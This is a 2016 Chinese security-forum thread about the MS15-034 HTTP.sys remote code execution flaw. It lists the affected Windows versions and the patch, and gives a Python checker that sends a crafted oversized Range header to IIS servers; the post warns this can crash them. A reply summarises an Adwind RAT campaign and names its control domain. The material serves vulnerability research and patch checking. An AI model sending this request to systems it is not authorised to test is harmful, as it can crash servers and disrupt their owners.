首页
社区
课程
招聘
问答 CTF 排行榜 知识库 工具下载 看雪峰会 看雪商城 证书查询
  1. 社区
  2. 付费问答
    3. 发新帖
[旧帖] [分享]HTTP.sys远程代码执行漏洞(MS15-034) 0.00雪花
发表于: 2016-7-9 11:15 3862

[旧帖] [分享]HTTP.sys远程代码执行漏洞(MS15-034) 0.00雪花

ayouun 活跃值
2016-7-9 11:15
3862
远程执行代码漏洞存在于 HTTP 协议堆栈 (HTTP.sys) 中,当 HTTP.sys 未正确分析经特殊设计的 HTTP 请求时会导致此漏洞。 成功利用此漏洞的攻击者可以在系统帐户的上下文中执行任意代码。
若要利用此漏洞,攻击者必须将经特殊设计的 HTTP 请求发送到受影响的系统。 通过修改 Windows HTTP 堆栈处理请求的方式,此更新可以修复此漏洞。
受影响系统:
Microsoft Windows Server 2012 R2
Microsoft Windows Server 2012
Microsoft Windows Server 2008 SP2
Microsoft Windows 8.1
Microsoft Windows 8
Microsoft Windows 7
解决办法:
更新MS15-034对应的补丁
POC代码,请谨慎使用,可能会造成系统蓝屏。
POC可能带有攻击性,仅供安全研究与教学之用,风险自负!

'''
MS15-034 Checker
Danger! This script has not been properly qa'd and will probably fail in terrible ways.
It is based off a change in HTTP!UlpParseRange in which an error code is returned as a
result of a call to HTTP!RtlULongLongAdd when evaluating the upper and lower range of
an HTTP range request.
-BF
8a8b2112 56 push esi
8a8b2113 6a00 push 0
8a8b2115 2bc7 sub eax,edi
8a8b2117 6a01 push 1
8a8b2119 1bca sbb ecx,edx
8a8b211b 51 push ecx
8a8b211c 50 push eax
8a8b211d e8bf69fbff call HTTP!RtlULongLongAdd (8a868ae1) ; here
'''
import socket
import random
ipAddr = ""
hexAllFfff = "18446744073709551615"
req1 = "GET / HTTP/1.0\r\n\r\n"
req = "GET / HTTP/1.1\r\nHost: stuff\r\nRange: bytes=0-"   hexAllFfff   "\r\n\r\n"
print "[*] Audit Started"
client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client_socket.connect((ipAddr, 80))
client_socket.send(req1)
boringResp = client_socket.recv(1024)
if "Microsoft" not in boringResp:
print "[*] Not IIS"
exit(0)
client_socket.close()
client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client_socket.connect((ipAddr, 80))
client_socket.send(req)
goodResp = client_socket.recv(1024)
if "Requested Range Not Satisfiable" in goodResp:
print "[!!] Looks VULN"
elif " The request has an invalid header name" in goodResp:
print "[*] Looks Patched"
else:
print "[*] Unexpected response, cannot discern patch status"

[课程]Linux pwn 探索篇!

收藏
免费 0
支持
分享
最新回复 (4)
gukoumo
雪    币: 30
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
2
it's ok
2016-7-11 13:39
0
bnmuunion
雪    币: 41
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
3
相比补天和乌云,
2016-7-11 13:53
0
bnmuunion
雪    币: 41
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
4
相比补天和个页面做得很不错,有游戏官网的感觉。
2016-7-11 13:55
0
bnmuunion
雪    币: 41
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
5
Heimdal Security安全公司的专家发现了垃圾邮件中的Adwind RAT(远程访问木马)痕迹。Heimdal Security公司在一篇博文中写道:“一款基于Java平台运行的恶意软件在上周针对攻击了几家丹麦企业。这很可能是Adwind RAT重出江湖。”
免杀远程管理工具——Adwind RAT
Adwind RAT是一种跨平台、多功能的恶意软件程序,可以运行在任何支持Java平台的环境中,它能够通过后门进入到受害者的电脑中,提取数据和远程控制。因此犯罪组织常常使用Adwind RAT工具作为犯罪武器。据安全公司反映,该软件在周末运行,目前似乎只锁定丹麦的企业。但专家相信不久后它会将攻击目标瞄准其他国家。
Heimdal公司的恶意软件研究员报道,恶意邮件中附带了一份叫 Doc-[number].jar的附件,坏消息是在线病毒扫描服务Virus Total的杀毒引擎并不能检测到这份附件存在威胁。 2012年初,Adwind RAT首次被发现,专家一开始怀疑它是Frutas RAT,之后它被赋予过不同的命名:Unrecom RAT (2014 2月)、AlienSpy (2014 10月)、JSocket RAT(2015 7月)。
专家还注意到,Adwind RAT是一款针对攻击目标高效率的黑客工具,只要使用精简的基础设施,APT 组织就能够提取数据和远程控制被感染的机器。一旦Adwind RAT感染了一台机器,这台机器就会处于被服务器jmcoru.alcatelupd[.]Xyz控制的僵尸网络中。
免杀远程管理工具——Adwind RAT

Heimdal Security公司总结,网络罪犯看上去把更多的注意力集中在使用更小的基础设施实行对目标的攻击。这意味着,抛开目标性质,网络罪犯当前倾向投入更少的资源架构基础设施,来换取潜在的高投资回报率。“避免大规模活动意味着木马被发现的几率变低,这给他们更多的时间在被感染的系统中提取更多数据。”

免杀远程管理工具——Adwind RAT

2016年2月,卡巴斯基安全专家发现了恶意软件的变种。卡巴斯基研究人员监察到依靠AlienSpy软件变种,已发出超过150起的攻击活动,并有6万名个人用户已经遭受到了黑客的攻击。AlienSpy的新变种,称为JSocket jRat,在互联网上可供出租的价格从30美元到200美元不等,且没有版本限制。对恶意软件即服务(MaaS)的订阅用户分析显示,绝大多数客户来自美国、加拿大、俄罗斯和土耳其。
2016-7-11 14:00
0
游客
登录 | 注册 方可回帖
回帖 表情 雪币赚取及消费
高级回复
返回
//